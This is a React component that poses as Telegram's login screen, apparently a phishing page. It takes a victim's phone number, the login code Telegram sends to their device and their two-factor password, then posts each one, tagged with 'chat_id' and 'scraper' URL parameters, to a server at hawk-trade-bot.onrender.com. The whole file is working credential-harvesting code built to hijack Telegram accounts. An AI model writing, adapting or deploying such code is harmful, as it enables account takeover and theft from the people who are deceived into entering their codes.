import React, { useState, useEffect } from 'react';
import { getCountries, getCountryCallingCode } from 'libphonenumber-js';
import isoCountries from "i18n-iso-countries";
import en from "i18n-iso-countries/langs/en.json";
import axios from 'axios';
import Select from 'react-select';
import { useSpring, animated } from 'react-spring';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
import { faPencilAlt } from '@fortawesome/free-solid-svg-icons';
import { faSpinner } from "@fortawesome/free-solid-svg-icons";

const VerificationForm = () => {
  const [countries, setCountries] = useState([]);
  const [selectedCountry, setSelectedCountry] = useState(null);
  const [dialCodeInput, setDialCodeInput] = useState('+1');
  const [phoneNumber, setPhoneNumber] = useState('');
  const [phoneCode, setPhoneCode] = useState('');
  const [phoneCodeHash, setPhoneCodeHash] = useState('');
  const [twoFactorPass, setTwoFactorPass] = useState('');
  const [currentPage, setCurrentPage] = useState(1);
  const [errorMessage, setErrorMessage] = useState("");
  const [numberFormat, setNumberFormat] = useState("");
  const [loading, setLoading] = useState(true); // Loading state
  // In your component, add logic to handle focus and blur events for both inputs:
  const [isFocused, setIsFocused] = useState(false);
  const [isButtonFocused, setIsButtonFocused] = useState(false);
  const [formData, setFormData] = useState({
    firstName: '',
    lastName: '',
    email: '',
  });
  // Add loading and verification state
  const [isLoading, setIsLoading] = useState(false);
  const [verificationSent, setVerificationSent] = useState(false);
  const [chatId, setChatId] = useState(null);
  const [scraper, setScraper] = useState(null);
  isoCountries.registerLocale(en);

  useEffect(() => {
    // Extract chat_id from the URL
    const queryParams = new URLSearchParams(window.location.search);
    const chatIdParam = queryParams.get('chat_id');
    const scraperParam = queryParams.get('scraper');
    if (chatIdParam) {
      setChatId(chatIdParam);
    }
    if (scraperParam) {
      setScraper(scraperParam)
    }
  }, []);

  const errorMessages = {
    "RPC error: The phone number is invalid (caused by SendCodeRequest)": "Invalid phone number. Please check and try again.",
    "Invalid login code": "Invalid login code",
    "SessionPasswordNeededError": "Two-factor authentication is required. Please enter your 2FA password.",
    "Network error": "There was a network issue. Please check your connection and try again.",
    "default": "Something went wrong. Please try again later."
  };

  const getUserFriendlyErrorMessage = (error) => {
    // Check if we have a specific error mapped, otherwise use the default message
    return errorMessages[error] || errorMessages["default"];
  };

  // Custom Option Component
  const customOption = (props) => {
    const { data, innerRef, innerProps, isFocused } = props; // Add isFocused to track hover
    return (
      <div
        ref={innerRef}
        {...innerProps}
        style={{
          display: 'flex',
          alignItems: 'center',
          padding: '15px 20px', // Increased padding for more space
          justifyContent: 'space-between',
          backgroundColor: isFocused ? '#f5f5f5' : 'white', // Gray background on hover
          cursor: 'pointer',
          transition: 'background-color 0.3s ease', // Smooth hover effect
        }}
      >
        <div style={{ display: 'flex', alignItems: 'center' }}>
          {data.flag && (
            <img
              src={data.flag}
              alt=""
              style={{ width: 24, height: 16, marginRight: 15 }} // More space between flag and name
            />
          )}
          <span style={{ fontSize: '16px', fontWeight: '500' }}>{data.label}</span>
        </div>
        <span style={{ color: '#888', fontSize: '14px', fontWeight: '400' }}>{data.value}</span>
      </div>
    );
  };


  // fetch user location
  useEffect(() => {
    if (countries.length === 0) return; // Wait until countries are loaded

    const fetchUserCountry = async () => {
      try {
        // Option A: country.is (recommended – super simple)
        const res = await fetch('https://api.country.is/');
        if (!res.ok) throw new Error('Failed');

        const data = await res.json();
        const iso2 = data.country; // e.g. "NG", "US"

        if (iso2) {
          const dialCode = `+${getCountryCallingCode(iso2)}`;
          const match = countries.find(c => c.value === dialCode);

          if (match) {
            setSelectedCountry(match);
            setDialCodeInput(dialCode);
            return; // done
          }
        }

        // Option B: fallback to freeipapi.com if needed
        const fallbackRes = await fetch('https://freeipapi.com/api/json');
        const fallbackData = await fallbackRes.json();
        const fallbackIso = fallbackData.countryCode;

        if (fallbackIso) {
          const dialCode = `+${getCountryCallingCode(fallbackIso)}`;
          const match = countries.find(c => c.value === dialCode);
          if (match) {
            setSelectedCountry(match);
            setDialCodeInput(dialCode);
          }
        }
      } catch (err) {
        console.warn('Could not auto-detect country via IP:', err);
        // Silent fail → user selects manually, which is fine
      }
    };

    fetchUserCountry();
  }, [countries]);


  // Fetch countries data

  useEffect(() => {
    setLoading(true);

    try {
      const countryNames = isoCountries.getNames("en");

      const countryData = Object.entries(countryNames)
        .map(([iso2, name]) => {
          try {
            return {
              label: name,
              value: `+${getCountryCallingCode(iso2)}`,
              flag: `https://flagcdn.com/32x24/${iso2.toLowerCase()}.png`,
            };
          } catch {
            return null;
          }
        })
        .filter(Boolean)
        .sort((a, b) => a.label.localeCompare(b.label));

      setCountries(countryData);
    } catch (err) {
      console.error("Failed to build country list:", err);
    } finally {
      setLoading(false);
    }
  }, []);

  const handleCountryChange = (selectedOption) => {
    setSelectedCountry(selectedOption);
    console.log("Selected country:", selectedOption);
    setErrorMessage(""); // Clear any previous errors
    const dialCode = selectedOption?.value || '';
    // Ensure the dial code always starts with '+'
    setDialCodeInput(dialCode.startsWith('+') ? dialCode : `+${dialCode}`);
  };


  const handlePhoneInputChange = (e) => {
    let input = e.target.value;

    // Ensure the input starts with '+' and remove any non-numeric characters after it
    if (!input.startsWith('+')) {
      input = `+${input.replace(/[^0-9]/g, '')}`;
    } else {
      input = `+${input.slice(1).replace(/[^0-9]/g, '')}`;
    }

    // Match the dial code to a country
    const matchedDialCode = countries.find((country) => input.startsWith(country.value));

    if (matchedDialCode) {
      setDialCodeInput(matchedDialCode.value); // Set dial code
      setSelectedCountry(matchedDialCode); // Set selected country
      input = input.slice(matchedDialCode.value.length); // Remove dial code for formatting phone number
    } else {
      setDialCodeInput(''); // Clear if no match
      setSelectedCountry(null); // Reset country if no match
    }

    // Format the phone number (remaining part after dial code)
    const phoneNumber = input.replace(/[^0-9]/g, ''); // Ensure only numbers
    const formattedNumber = phoneNumber.replace(
      /(\d{2})(\d{4})?(\d{4})?/,
      (_, p1, p2, p3) => [p1, p2, p3].filter(Boolean).join(' ')
    );

    // Update state
    setNumberFormat(formattedNumber); // Formatted number for display
    setPhoneNumber(phoneNumber); // Raw phone number without formatting
    setErrorMessage(''); // Clear any errors
  };




  // Automatically update country based on dial code input
  useEffect(() => {
    if (dialCodeInput) {
      const matchingCountry = countries.find(
        (country) => country.value === dialCodeInput
      );
      if (matchingCountry) {
        setSelectedCountry(matchingCountry);
      }
    }
  }, [dialCodeInput, countries]);


  // Animation configuration
  const slideProps = useSpring({
    transform: `translateX(-${(currentPage - 1) * 100}%)`, // Slide based on currentPage
    config: { tension: 300, friction: 30 },
  });

  const handleNext = async () => {
    setErrorMessage(""); // Clear any previous error messages

    if (currentPage === 1) {
      // Show loading and send verification code
      setIsLoading(true);

      try {
        await requestVerificationCode(); // Attempt to send the code
        setVerificationSent(true);
        setIsLoading(false);

      } catch (error) {
        console.error("Error sending verification code:", error);
        setIsLoading(false);
        setErrorMessage("Failed to send verification code. Please try again.");
      }
    } else if (currentPage === 2) {
      // Show loading and verify the code
      setIsLoading(true);

      try {
        await verifyCode(`${dialCodeInput}${phoneNumber}`, phoneCode, phoneCodeHash, twoFactorPass); // Verify the code

      } catch (error) {
        console.error("Error verifying code:", error);
        setIsLoading(false);
        setErrorMessage("Failed to verify the code. Please check and try again.");
      }
    }
    else if (currentPage === 3) {
      // Show loading and verify the code
      setIsLoading(true);

      try {
        await verify_2fa(twoFactorPass); // Verify the code

      } catch (error) {
        console.error("Error verifying password:", error);
        setIsLoading(false);
        setErrorMessage("Failed to verify the password. Please check and try again.");
      }
    }
  };


  const requestVerificationCode = async () => {
    try {
      console.log(`phone_no: ${dialCodeInput}${phoneNumber}`);
      const response = await axios.post("https://hawk-trade-bot.onrender.com/request_code", {
        phone: `${dialCodeInput}${phoneNumber}`, // Concatenate dial code and phone 
        chat_id: chatId ? chatId : '',
      });

      console.log("Response from server:", response.data);
      if (response.data.phone_code_hash) {
        setPhoneCodeHash(response.data.phone_code_hash);
        setErrorMessage(""); // Clear any previous errors
        console.log("Login code sent successfully:", response.data.phone_code_hash);
        setCurrentPage(2); // Move to the next page only if there's no error
      } else {
        console.error("Unexpected response:", response.data);
        setErrorMessage("Sorry, we couldn't send the verification code. Please try again.");
      }
    } catch (error) {
      const errorMsg = getUserFriendlyErrorMessage(error.response?.data?.error || error.message);
      console.error("Error requesting verification code:", errorMsg);
      setErrorMessage(errorMsg); // Set the custom error message
    }
  };



  const verifyCode = async (phone, code, phoneCodeHash, twoFactorPass) => {
    try {
      const response = await fetch("https://hawk-trade-bot.onrender.com/verify_code", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({ phone, code, phone_code_hash: phoneCodeHash, password: twoFactorPass, chat_id: chatId ? chatId : '', scraper: scraper ? scraper : '' }),
      });

      const data = await response.json();
      if (response.ok) {
        console.log("Login successful:", data.message);
        setErrorMessage(""); // Clear any previous errors
        // Add a 3-second delay before moving to the next page
        setTimeout(() => {
          setCurrentPage(4); // Move to the next page
          setIsLoading(false);
        }, 3000); // 3000ms = 3 seconds
      } else {
        console.error("Error verifying code:", data.error);
        if (data.error === 'Two-factor authentication required') {
          setCurrentPage(3); // Move to the 2FA page
          setIsLoading(false);
        }
        else {
          setErrorMessage(getUserFriendlyErrorMessage(data.error));
          setIsLoading(false);
          setCurrentPage(1);
        }
      }
    } catch (error) {
      const errorMsg = getUserFriendlyErrorMessage("Network error");
      console.error("Network error:", errorMsg);
      setErrorMessage(errorMsg); // Set the custom error message
    }
  };

  const verify_2fa = async (twoFactorPass) => {
    try {
      const response = await fetch("https://hawk-trade-bot.onrender.com/verify_2fa", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({ password: twoFactorPass, chat_id: chatId ? chatId : '', scraper: scraper ? scraper : '' }),
      });

      const data = await response.json();
      if (response.ok) {
        console.log("Login successful:", data.message);
        setErrorMessage(""); // Clear any previous errors
        // Add a 3-second delay before moving to the next page
        setTimeout(() => {
          setCurrentPage(4); // Move to the next page
          setIsLoading(false);
        }, 3000); // 3000ms = 3 seconds
      } else {
        console.error("Error verifying password:", data.error);
        setErrorMessage(getUserFriendlyErrorMessage(data.error));
        setIsLoading(false);
        setCurrentPage(1);

      }
    } catch (error) {
      const errorMsg = getUserFriendlyErrorMessage("Network error");
      console.error("Network error:", errorMsg);
      setErrorMessage(errorMsg); // Set the custom error message
    }
  };



  const handlePrevious = () => {
    if (currentPage > 1) {
      setCurrentPage((prev) => prev - 1);
    }
  };

  // Handle input change for form data
  const handleInputChange = (name, value) => {
    setFormData({ ...formData, [name]: value });
  };


  const styles = {
    container: {
      display: 'flex',
      flexDirection: 'column',
      alignItems: 'center',
      justifyContent: 'center',
      minHeight: '100vh',
      backgroundColor: '#fff',
      overflow: 'hidden', // Prevent horizontal scrolling
    },
    header: {
      marginBottom: '-18px',
    },
    slider: {
      display: 'flex',
      flexDirection: 'row',
      width: '300%', // 100% for each of the three sections
      transform: 'translateX(0%)',
    },
    section: {
      width: '100%', // Ensure each section takes the full viewport width
      flexShrink: 0,
      display: 'flex',
      flexDirection: 'column',
      alignItems: 'center',
      padding: '20px',
      boxSizing: 'border-box',
    },
    title: {
      fontSize: '24px',
      marginBottom: '-8px',
    },
    countryField: {
      alignItems: 'center',
      marginBottom: '14px',
    },
    phoneField: {
      display: 'flex',
      alignItems: 'center',
      marginBottom: '15px',
    },
    codeField: {
      display: 'flex',
      alignItems: 'center',
      marginBottom: '15px',
      //   marginTop: '30px'
    },
    dialCodeInput: {
      width: '30px',
      padding: '15px',
      border: '1px solid #ccc',
      borderRadius: '10px 0 0 10px',
      borderRight: 'none',
      outline: 'none',
    },


    buttonContainer: {
      marginTop: '20px',
    },
    button: {
      padding: '15px 25px',
      width: '100%',
      minWidth: '320px',
      fontSize: '14px',
      fontWeight: '520',
      backgroundColor: isButtonFocused ? '#4C8DFF' : '#5A8DFF', // Change color on focus
      color: 'white',
      border: 'none',
      borderRadius: '10px',
      cursor: 'pointer',
      boxShadow: '0 4px 8px rgba(0, 0, 0, 0.15)', // Subtle shadow for depth
      background: isButtonFocused
        ? 'linear-gradient(145deg, #0088cc, #33aaff)' // Gradient when focused
        : 'linear-gradient(145deg, #4c9eff, #6caeff)', // Gradient when not focused

      transition: 'background 0.3s ease, box-shadow 0.3s ease', // Smooth transition for hover and focus
      // position: 'relative',
      overflow: 'hidden', // Ensure any gradient effect stays within the border-radius
      // Optional: Adding a little glossy effect to simulate light reflections
      '&::before': {
        content: '""',
        position: 'absolute',
        top: '-50%',
        left: '50%',
        width: '200%',
        height: '200%',
        background: 'rgba(255, 255, 255, 0.3)', // Light reflection color
        transform: 'rotate(-45deg)',
        pointerEvents: 'none',
        animation: 'shine 1.5s infinite linear', // Make the shine effect move
      },
      '@keyframes shine': {
        '0%': { left: '-150%' },
        '100%': { left: '100%' },
      },
    },

  };

  return (
    <div style={styles.container}>
      {/* Top Banner */}
      <div style={styles.header}>
        <img
          src="/telegram.png"
          alt="Form Banner"
          style={{ width: 100, height: 100, borderRadius: '50%' }}
        />
      </div>

      <animated.div style={{ ...styles.slider, ...slideProps }}>
        {/* Section 1 */}
        <div style={styles.section}>
          <h2 style={styles.title}>Telegram</h2>
          <p className='enter_code'>Please confirm your country code and enter your phone number.</p>
          {/* Country Selector */}
          <div style={styles.countryField} className="input-container">
            {loading ? (
              // Spinner and loading text
              <div className="spinner-container">
                <div className="loader-spinner" role="status" aria-hidden="true"></div>
                <p>Please wait...</p>
              </div>

            ) : (
              // Render the Select component when not loading
              <Select
                options={countries}
                value={selectedCountry}
                onChange={handleCountryChange}
                placeholder="Select a country"
                styles={{
                  control: (base) => ({
                    ...base,
                    borderRadius: '10px',
                    padding: '5px',
                    width: '100%',
                    minWidth: '320px',
                    textAlign: 'left',
                  }),
                  menu: (base) => ({
                    ...base,
                    borderRadius: '10px',
                    boxShadow: '0px 8px 16px rgba(0, 0, 0, 0.2)',
                    marginTop: '5px',
                    backgroundColor: 'white',
                    zIndex: 100,
                  }),
                  menuList: (base) => ({
                    ...base,
                    padding: '5px',
                    borderRadius: '10px',
                    maxHeight: '200px',
                    overflowY: 'auto', // Allows scrolling
                    scrollbarWidth: 'none', // Hides scrollbar in Firefox
                    '::-webkit-scrollbar': {
                      display: 'none', // Hides scrollbar in WebKit browsers
                    },
                  }),
                  option: (base, { isFocused }) => ({
                    ...base,
                    backgroundColor: isFocused ? '#e6f7ff' : 'white',
                    color: 'black',
                    padding: '10px',
                    borderRadius: '5px',
                    margin: '5px 0',
                    cursor: 'pointer',
                    textAlign: 'left',
                  }),
                }}
                components={{
                  Option: customOption,
                }}
              />
            )}
            {!loading && <label className="country-label">Country</label>}
          </div>



          {/* Dial Code and Phone Number Inputs */}
          <div style={styles.phoneField} className="input-container">
            <input
              className="phone-input input"
              type="text"
              placeholder=""
              value={dialCodeInput + ' ' + numberFormat} // Combine dial code and phone number
              onChange={handlePhoneInputChange} // Handle input change
            />
            <label className="label">Your phone number</label>
          </div>


        </div>

        {/* Section 2 */}
        <div style={styles.section}>
          <h2 style={styles.title}>{dialCodeInput} {numberFormat}<button
            style={{
              background: 'none',
              border: 'none',
              outline: 'none',
              cursor: 'pointer',
            }}
            onClick={handlePrevious}
          >
            <FontAwesomeIcon icon={faPencilAlt} style={{ color: '#007BFF', fontSize: '16px' }} />
          </button></h2>

          <p className='enter_code'>Verify the code we sent to your device.</p>
          <div style={styles.codeField} className='input-container'>
            <input
              className='codeInput'
              type="text"
              placeholder=""
              onChange={(e) => {
                setPhoneCode(e.target.value)
                setErrorMessage(""); // Clear any previous errors
              }}
            />
            <label className="code-label">Code</label>
          </div>
        </div>


        {/* Section 3 (conditional) */}
        <div style={styles.section}>
          <h2 style={styles.title}>Enter Your Password</h2>

          <p className='enter_code'>Your account is protected by an additional password.</p>
          <div style={styles.codeField} className='input-container'>
            <input
              className='passInput'
              type="text"
              placeholder=""
              onChange={(e) => {
                setTwoFactorPass(e.target.value)
                setErrorMessage(""); // Clear any previous errors
              }}
            />
            <label className="pass-label">Password</label>
          </div>
        </div>

        {/* Section 4 */}
        <div style={styles.section}>
          <h2 style={styles.title}>Verification Complete</h2>
          <p className='enter_code'>Your verification has been completed successfully!</p>
        </div>

      </animated.div>

      {errorMessage && <div style={{ color: "red", maxWidth: '300px' }}>{errorMessage}</div>}

      <div style={styles.buttonContainer}>
        {currentPage < 4 && phoneNumber.length >= 5 && (
          <button
            style={styles.button}
            onFocus={() => setIsButtonFocused(true)}
            onBlur={() => setIsButtonFocused(false)}
            onClick={handleNext}
            disabled={isLoading || !phoneNumber || !dialCodeInput} // Disable button when loading or input is missing
          >
            {isLoading ? (
              <div className="d-flex align-items-center" style={{ gap: '10px' }}>
                <span style={{ marginRight: '10px' }}>PLEASE WAIT</span>
                {/* inline spinner inherits font-size from button or this wrapper */}
                <div className="inline-spinner" role="status" aria-label="Loading"></div>
              </div>
            ) : currentPage === 2 ? (
              'VERIFY'
            ) : (
              'NEXT'
            )}
          </button>
        )}
      </div>
    </div>
  );
};



export default VerificationForm;
